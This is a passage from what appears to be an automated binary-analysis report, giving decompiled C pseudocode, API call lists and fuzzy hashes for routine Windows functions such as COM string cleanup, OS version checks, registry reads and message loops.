								if( *((intOrPtr*)(_t123 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x74)));
								}
								if( *((intOrPtr*)(_t123 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x70)));
								}
								if( *((intOrPtr*)(_t123 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t123 - 0x6c)));
								}
								 *(_t123 - 0x14) =  *(_t123 - 0x14) + 1;
								 *(_t123 - 0x18) =  *(_t123 - 0x18) + 0x10;
							}
						}
						 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
						__imp__#9(_t123 - 0x48);
					} while ( *((intOrPtr*)(_t123 - 0x20)) != 0);
					L17:
					 *(_t123 - 0x10) =  *(_t123 - 0x10) + 1;
				} while ( *(_t123 - 0x10) <  *((intOrPtr*)(_t122 + 0x10)));
				goto L18;
			}

APIs

__EH_prolog3.LIBCMT ref: 0041F0D3
_memset.LIBCMT ref: 0041F13F

Part of subcall function 00422542: _memset.LIBCMT ref: 0042254A

VariantClear.OLEAUT32(?), ref: 0041F17F
SysFreeString.OLEAUT32(00000000), ref: 0041F200
SysFreeString.OLEAUT32(00000000), ref: 0041F20F
SysFreeString.OLEAUT32(00000000), ref: 0041F21E
VariantClear.OLEAUT32(00000000), ref: 0041F233

Part of subcall function 0041EBB5: __EH_prolog3.LIBCMT ref: 0041EBD1
Part of subcall function 0041EBB5: VariantClear.OLEAUT32(?), ref: 0041EC36

Part of subcall function 00422522: VariantCopy.OLEAUT32(?,?), ref: 00422530

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
String ID:
API String ID: 2905758408-0
Opcode ID: 8ec13566ed1b3366a01422b4a0fd206da0a8edd7b3d5e886eb35b1c28274e312
Instruction ID: 45f7f687c54e46359158663f4887d200d7890bb6172cacd6b8dac8476fac9783
Opcode Fuzzy Hash: 8ec13566ed1b3366a01422b4a0fd206da0a8edd7b3d5e886eb35b1c28274e312
Instruction Fuzzy Hash: AA510871E00209EFDB10CFA4D885BEEBBB4BF08304F14456AE516E7291D779A985CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00414935, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00414935(void* __ebx, intOrPtr __ecx, struct _OSVERSIONINFOA __edi, void* __esi, void* __eflags) {
				intOrPtr _t70;
				signed int _t72;
				char* _t89;
				intOrPtr _t92;
				void* _t101;
				char* _t102;
				signed char _t103;
				void* _t110;
				intOrPtr _t118;
				void* _t119;
				void* _t120;
				signed int _t129;

				_t115 = __edi;
				_push(0xa4);
				E00427243(E0043A462, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t119 - 0xac)) =  *((intOrPtr*)(_t119 + 0x10));
				 *((intOrPtr*)(_t119 - 0xa8)) =  *((intOrPtr*)(_t119 + 0x18));
				_t118 = __ecx;
				 *((intOrPtr*)(_t119 - 0xb0)) = __ecx;
				E0040C102(__ecx, 0,  *((intOrPtr*)(_t119 + 0x1c)));
				 *((intOrPtr*)(_t119 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x43ec8c;
				E00402310(__ecx + 0x7c);
				 *((char*)(_t119 - 4)) = 1;
				if( *((intOrPtr*)(_t119 + 0x20)) == 0) {
					_t115 = 0x94;
					E004277B0(0x94, _t119 - 0xa4, 0, 0x94);
					_t120 = _t120 + 0xc;
					 *(_t119 - 0xa4) = 0x94;
					GetVersionExA(_t119 - 0xa4);
					if( *((intOrPtr*)(_t119 - 0x94)) != 2) {
						L3:
						 *((intOrPtr*)(_t119 + 0x20)) = 0x4c;
					} else {
						 *((intOrPtr*)(_t119 + 0x20)) = 0x58;
						if( *((intOrPtr*)(_t119 - 0xa0)) < 5) {
							goto L3;
						}
					}
				}
				_t70 = E00426490(0, _t110, _t115, _t118,  *((intOrPtr*)(_t119 + 0x20)));
				_pop(_t101);
				 *((intOrPtr*)(_t118 + 0x74)) = _t70;
				if(_t70 == 0) {
					_t70 = E00415804(_t101);
				}
				E004277B0(_t115, _t70, 0,  *((intOrPtr*)(_t119 + 0x20)));
				_t72 =  *(_t119 + 8);
				 *(_t118 + 0x78) = _t72;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t118 + 0x54)) =  ~_t72 + 0x7005;
				 *((intOrPtr*)(_t118 + 0x1c4)) = 0;
				_t102 = _t118 + 0x80;
				 *_t102 = 0;
				_t116 = _t118 + 0xc0;
				 *_t116 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)))) =  *((intOrPtr*)(_t119 + 0x20));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x1c)) = _t116;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x20)) = 0x104;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t119 + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x24)) = _t102;
				_t103 = 0x40;
				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x28) = _t103;
				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) |  *(_t119 + 0x14) | 0x00080020;
				if(( *(_t119 + 0x14) & _t103) != 0) {
					_t92 =  *((intOrPtr*)(_t118 + 0x74));
					_t48 = _t92 + 0x34;
					 *_t48 =  *(_t92 + 0x34) & 0xff7fffff;
					_t129 =  *_t48;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 8)) =  *((intOrPtr*)(E0040E67F(0, _t116, _t118, _t129) + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x44)) = E00421EB8;
				if( *((intOrPtr*)(_t119 - 0xac)) != 0) {
					E00414516(_t119, _t116, 0x104,  *((intOrPtr*)(_t119 - 0xac)), 0xffffffff);
				}
				if( *((intOrPtr*)(_t119 - 0xa8)) != 0) {
					_t116 = _t118 + 0x7c;
					E00402030(_t118 + 0x7c,  *((intOrPtr*)(_t119 - 0xa8)));
					_t88 = E00401D50(_t118 + 0x7c, 0);
					while(1) {
						_t89 = E00429260(_t88, 0x7c);
						if(_t89 == 0) {
							break;
						}
						 *_t89 = 0;
						_t88 = _t89 + 1;
						__eflags = _t89 + 1;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0xc)) =  *((intOrPtr*)(_t118 + 0x7c));
				}
				return E004272C6(0, _t116, _t118);
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 0041493F

Part of subcall function 0040C102: _memset.LIBCMT ref: 0040C119

_memset.LIBCMT ref: 00414992
GetVersionExA.KERNEL32(?), ref: 004149A7
_malloc.LIBCMT ref: 004149D0
_memset.LIBCMT ref: 004149E7

Strings

L, xrefs: 004149C6

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$H_prolog3_Version_malloc
String ID: L
API String ID: 1339555267-2909332022
Opcode ID: 39172b4297b7236eeb44183646343e2e8ea03628b1dfb4bf8f10ce0ffe30817a
Instruction ID: e205e8ae423d24fd0487dcf17ae961cf056f98499406a33800e433e093a986be
Opcode Fuzzy Hash: 39172b4297b7236eeb44183646343e2e8ea03628b1dfb4bf8f10ce0ffe30817a
Instruction Fuzzy Hash: E1518EB0A40744CFDB21DF29C980A9ABBE0BF48304F01469EE99997361C778E940CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE2C, Relevance: 10.6, APIs: 7, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041BE2C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t59;
				intOrPtr* _t63;
				intOrPtr* _t64;
				intOrPtr* _t69;
				intOrPtr _t70;
				intOrPtr* _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				intOrPtr* _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E004271DA(E0043ACD4, __ebx, __edi, __esi);
				_t97 =  *((intOrPtr*)(_t101 + 8)) + 0xffffff28;
				E0040E6CB(_t101 - 0x18, _t103,  *((intOrPtr*)( *((intOrPtr*)(_t101 + 8)) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *((intOrPtr*)(_t101 - 0x14));
					if( *((intOrPtr*)(_t101 - 0x14)) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E0040DF8F();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E004272B2(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *((intOrPtr*)(_t101 + 0xc));
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *((intOrPtr*)(_t101 + 0xc))) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *((intOrPtr*)(_t97 + 0x50));
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *((intOrPtr*)(_t101 + 8)) = 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x441d44, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E004277B0(_t97, _t101 - 0x48, 0, 0x20);
						E004277B0(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *((intOrPtr*)(_t101 + 8));
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *((intOrPtr*)(_t101 + 0xc)), 0x441db4, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *((intOrPtr*)(_t101 - 0x44));
						_t82 = __imp__#6;
						 *((intOrPtr*)(_t101 + 0xc)) = _t70;
						if( *((intOrPtr*)(_t101 - 0x44)) != 0) {
							 *_t82( *((intOrPtr*)(_t101 - 0x44)));
						}
						__eflags =  *((intOrPtr*)(_t101 - 0x40));
						if( *((intOrPtr*)(_t101 - 0x40)) != 0) {
							 *_t82( *((intOrPtr*)(_t101 - 0x40)));
						}
						__eflags =  *((intOrPtr*)(_t101 - 0x3c));
						if( *((intOrPtr*)(_t101 - 0x3c)) != 0) {
							 *_t82( *((intOrPtr*)(_t101 - 0x3c)));
						}
						_t71 =  *((intOrPtr*)(_t101 + 8));
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *((intOrPtr*)(_t101 + 0xc));
						if( *((intOrPtr*)(_t101 + 0xc)) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E00415838(_t85);
					goto L9;
				}
				 *((intOrPtr*)(_t101 - 0x68)) =  *((intOrPtr*)(_t101 + 0xc));
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				E00419B69(_t97, _t101 - 0x6c);
				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *((intOrPtr*)(_t101 - 0x14)) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E0040DF8F();
				}
				_t59 = _t98;
				goto L22;
			}

APIs

__EH_prolog3.LIBCMT ref: 0041BE33
VariantClear.OLEAUT32(?), ref: 0041BEC9
_memset.LIBCMT ref: 0041BF02
_memset.LIBCMT ref: 0041BF0E
SysFreeString.OLEAUT32(?), ref: 0041BF53
SysFreeString.OLEAUT32(?), ref: 0041BF5D
SysFreeString.OLEAUT32(?), ref: 0041BF67

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString$_memset$ClearH_prolog3Variant
String ID:
API String ID: 3574576181-0
Opcode ID: 13a0d851b816542f41455e046981a0cea57a43449bb26d0c438d6a48d8f6c46d
Instruction ID: 71aceca4d7b1fc29c1e095b9e1f0a7388e71ecb59a13ac91c01afb7a8988f0dc
Opcode Fuzzy Hash: 13a0d851b816542f41455e046981a0cea57a43449bb26d0c438d6a48d8f6c46d
Instruction Fuzzy Hash: 8B411871E00229EFCB11DFA1C845ADEBB79FF08B14F10851AF515AA290C7789A91CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 10001B85, Relevance: 10.6, APIs: 7, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E10001B85(void* __ecx, void* __eflags, signed int __fp0, void* _a4, int _a8) {
				char _v8;
				void* _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t31;
				void* _t35;
				signed int _t39;
				void* _t50;
				int _t56;
				void* _t77;
				void* _t87;

				_t77 = __ecx;
				_t76 = __ecx + 0x24;
				E1000128D(__ecx + 0x24);
				_t31 = _a8;
				if(_t31 <= 0) {
					_t55 = __ecx + 0x50;
					E10001030(_t76, __eflags, __fp0, __ecx + 0x50, 3);
					E1000128D(_t77 + 0x34);
					E10001030(_t77 + 0x34, __eflags, __fp0, _t55, 3);
					L7:
					_t35 = E1000112E(_t76);
					return E10001CF7(E100012B3(_t76, 0), _t35, 0x19000);
				}
				_v20 = _v20 & 0x00000000;
				_v24 = _t31;
				asm("fild qword [ebp-0x14]");
				_t87 = __fp0 *  *0x1001b3f8 +  *0x1001b3f0;
				L100158A0();
				_push(_t31);
				_v8 = _t31;
				L10015806();
				_t56 = _t31;
				if(_t56 == 0) {
					return _t31;
				}
				_t39 = E10015D10(_t56,  &_v8, _a4, _a8);
				if(_t39 == 0) {
					_v16 = _v8 + 0xf;
					E10001030(_t76, __eflags, _t87, _t77 + 0x50, 3);
					E10001030(_t76, __eflags, _t87,  &_v16, 4);
					E10001030(_t76, __eflags, _t87,  &_a8, 4);
					_v20 = 0x12b7a6;
					E10001030(_t76, __eflags, _t87,  &_v20, 4);
					_t50 = E10001030(_t76, __eflags, _t87, _t56, _v8);
					_push(_t56);
					L10015800();
					_push(_a8);
					L10015806();
					_v12 = _t50;
					memcpy(_t50, _a4, _a8);
					E1000128D(_t77 + 0x34);
					E10001030(_t77 + 0x34, __eflags, _t87, _v12, _a8);
					__eflags = _v12;
					if(_v12 != 0) {
						_push(_v12);
						L10015800();
					}
					goto L7;
				}
				_push(_t56);
				L10015800();
				return _t39 | 0xffffffff;
			}

0x10001b8d
0x10001b90
0x10001b95
0x10001b9a
0x10001b9f
0x10001c91
0x10001c99
0x10001ca1
0x10001cac
0x10001cb1
0x10001cb8
0x00000000
0x10001cca
0x10001ba5
0x10001ba9
0x10001bac
0x10001bb5
0x10001bbb
0x10001bc0
0x10001bc1
0x10001bc4
0x10001bc9
0x10001bce
0x10001cd3
0x10001cd3
0x10001bdf
0x10001be9
0x10001c04
0x10001c0b
0x10001c18
0x10001c25
0x10001c32
0x10001c39
0x10001c44
0x10001c49
0x10001c4a
0x10001c4f
0x10001c52
0x10001c5a
0x10001c61
0x10001c6e
0x10001c7b
0x10001c80
0x10001c84
0x10001c86
0x10001c89
0x10001c8e
0x00000000
0x10001c84
0x10001beb
0x10001bec
0x00000000

APIs

Part of subcall function 1000128D: VirtualFree.KERNEL32(?,00000000,00008000,?,10001B9A,?,?,00000000,?,?,1000B1F6,000000C8,000002F0), ref: 1000129F

_ftol.MSVCRT ref: 10001BBB
#823.MFC42(00000000,?,?,00000000), ref: 10001BC4
#825.MFC42(00000000,?,?,?,00000000), ref: 10001BEC
#825.MFC42(00000000,00000000,000002F0,00000000,00000004,1000B1F6,00000004,1000B1F6,00000004,?,00000003,?,?,?,00000000), ref: 10001C4A
#823.MFC42(1000B1F6,00000000,00000000,000002F0,00000000,00000004,1000B1F6,00000004,1000B1F6,00000004,?,00000003,?,?,?,00000000), ref: 10001C52
memcpy.MSVCRT ref: 10001C61
#825.MFC42(00000000,000000C8,1000B1F6,00000004,1000B1F6,00000004,?,00000003,?,?,?,00000000), ref: 10001C89

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #825$#823$FreeVirtual_ftolmemcpy
String ID:
API String ID: 1134963383-0
Opcode ID: ac6d0aa40b4d901b82dd967c197a3843b883decac620b0a2e869399c81516e25
Instruction ID: b94403c02b2d6be8a8f242edd36029bb1275be37427a188d0d6c95c8556ff4f0
Opcode Fuzzy Hash: ac6d0aa40b4d901b82dd967c197a3843b883decac620b0a2e869399c81516e25
Instruction Fuzzy Hash: CB31D379A00208BBEB05DFA4CC92FEE77AEEF44390F540029F512AA185DF70EB549710

Uniqueness

Uniqueness Score: -1.00%

Function 0040D902, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040D902(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				signed int _t39;
				char _t43;
				void* _t46;
				void* _t53;
				char* _t60;
				intOrPtr* _t73;
				intOrPtr* _t74;
				void* _t77;
				intOrPtr* _t78;
				void* _t94;
				intOrPtr* _t96;
				void* _t97;
				char* _t100;

				_t91 = __edx;
				_t78 = __ecx;
				_t76 = __ebx;
				_t100 =  &_v272;
				_t39 =  *0x44f5d0; // 0x8e7de579
				_a264 = _t39 ^ _t100;
				_push(0x18);
				E004271DA(E00439B9D, __ebx, __edi, __esi);
				_t96 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t43 = E0040D6FF(__ecx, __edx);
				_v28 = _t43;
				if(_t43 != 0) {
					do {
						_t74 =  &_v28;
						_push(_t74);
						_t78 = _t96;
						E0040D710();
						if(_t74 != 0) {
							_t91 =  *_t74;
							_t78 = _t74;
							 *((intOrPtr*)( *_t74 + 0xc))(0, 0xfffffffc, 0, 0);
						}
					} while (_v28 != 0);
				}
				if( *((intOrPtr*)(_t96 + 0x54)) == 0) {
					L12:
					 *[fs:0x0] = _v12;
					_pop(_t94);
					_pop(_t97);
					_pop(_t77);
					_t46 = E0042569C(1, _t77, _a264 ^ _t100, _t91, _t94, _t97);
					__eflags =  &_a268;
					return _t46;
				} else {
					if((0 |  *((intOrPtr*)(_t96 + 0x68)) != 0x00000000) != 0) {
						E00401EE0(_t76, _t100, "Software\\");
						_v4 = 0;
						E00401C10(0,  *((intOrPtr*)(_t96 + 0x54)));
						_push("\\");
						_push( &_v16);
						_push( &_v36);
						_t53 = E0040D78F(_t76, 0, _t96, __eflags);
						_push( *((intOrPtr*)(_t96 + 0x68)));
						_v4 = 1;
						_push(_t53);
						_push( &_v24);
						E0040D78F(_t76, 0, _t96, __eflags);
						_v4 = 3;
						E00401E60(_v36 + 0xfffffff0, _t91);
						_push( &_v24);
						_push(0x80000001);
						E0040D7F3(_t76, 0, 0x80000001, __eflags);
						_t60 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t60;
						if(_t60 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t100, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E0040D7F3(_t76, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t100,  &_v32);
						E00401E60( &(_v24[0xfffffffffffffff0]), _t91);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E00401E60( &(_v16[0xfffffffffffffff0]), _t91);
						goto L12;
					} else {
						_push(_t100);
						_push(_t78);
						_t36 =  &_v280; // 0x44e938
						_v280 = 0x44e9d0;
						E00429326(_t36, 0x448990);
						asm("int3");
						_t73 = _t78;
						 *((intOrPtr*)(_t73 + 4)) = 1;
						return _t73;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 0040D921
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0040D9DD
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 0040D9F4
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 0040DA0E
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 0040DA20

Strings

Software\, xrefs: 0040D976

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: 8fa51ae453399f767d1ff25cc4831ad069edc7689dda660ed02f68c8ac803ef6
Instruction ID: eca8862fe7a70fdf76533bd803f628b6a1364c9e388db0c8905a4c44f944f400
Opcode Fuzzy Hash: 8fa51ae453399f767d1ff25cc4831ad069edc7689dda660ed02f68c8ac803ef6
Instruction Fuzzy Hash: 88415971D00109ABCB11EBA5DC41AFEB7B9EF48318F10053AF551F22D1DB789A49CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004109D8, Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004109D8(intOrPtr* __ecx, void* __edx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				int _t53;
				long _t56;
				signed int _t62;
				void* _t68;
				intOrPtr* _t70;
				void* _t71;

				_t68 = __edx;
				_t62 = 1;
				_t70 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E00415985(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t70 + 0x20));
				 *(_t70 + 0x3c) =  *(_t70 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E0040D091(0);
				_t71 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t76 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E0040D4B8(_t68, 0, _t70, _t76);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E00415A53(_t70, 1);
									UpdateWindow( *(_t70 + 0x20));
									_t62 = 0;
								}
							}
							_t48 =  *((intOrPtr*)( *_t70 + 0x80))();
							_t82 = _t48;
							if(_t48 == 0) {
								_t39 = _t70 + 0x3c;
								 *_t39 =  *(_t70 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t70 + 0x44));
							} else {
								if(E0040D3D2(_t62, 0, _t70, _t71, _t82, _v8) != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E0040A85C();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						E00415A53(_t70, 1);
						UpdateWindow( *(_t70 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t70 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t70 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

APIs

GetParent.USER32(?), ref: 00410A06
PeekMessageA.USER32 ref: 00410A2D
UpdateWindow.USER32(?), ref: 00410A47
SendMessageA.USER32(?,00000121,00000000,?), ref: 00410A6B
SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 00410A85
UpdateWindow.USER32(?), ref: 00410ACB
PeekMessageA.USER32 ref: 00410AFF

Part of subcall function 00415985: GetWindowLongA.USER32 ref: 00415990

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 239dfc537d2c71071682d00c4205c3eed67dc0c5750460e42d16bef052ca46b4
Instruction ID: e52ed32a603a333b8822f58d9dc957422d84ccd9afbe44cb2a13564fd1e6091b
Opcode Fuzzy Hash: 239dfc537d2c71071682d00c4205c3eed67dc0c5750460e42d16bef052ca46b4
Instruction Fuzzy Hash: 8041C0306043419BC721DF66DC44AABBEF4FFE4B98F04492EF48191261C7BA98C4CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A40F, Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040A40F(long __ecx) {
				long _v4;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t16;
				long _t19;
				long _t20;
				struct HWND__* _t21;
				long _t22;
				struct HWND__* _t23;
				long _t24;
				struct HWND__* _t25;
				long _t29;
				void* _t30;
				void* _t33;
				long _t38;
				void* _t41;
				void* _t44;
				struct HWND__* _t45;
				struct HWND__* _t47;
				struct HWND__* _t48;
				long _t50;
				long _t52;

				_t36 = __ecx;
				_t16 =  *((intOrPtr*)(__ecx + 0x78));
				if(_t16 == 0) {
					_t50 = E0040A3FC();
					__eflags = _t50;
					if(_t50 != 0) {
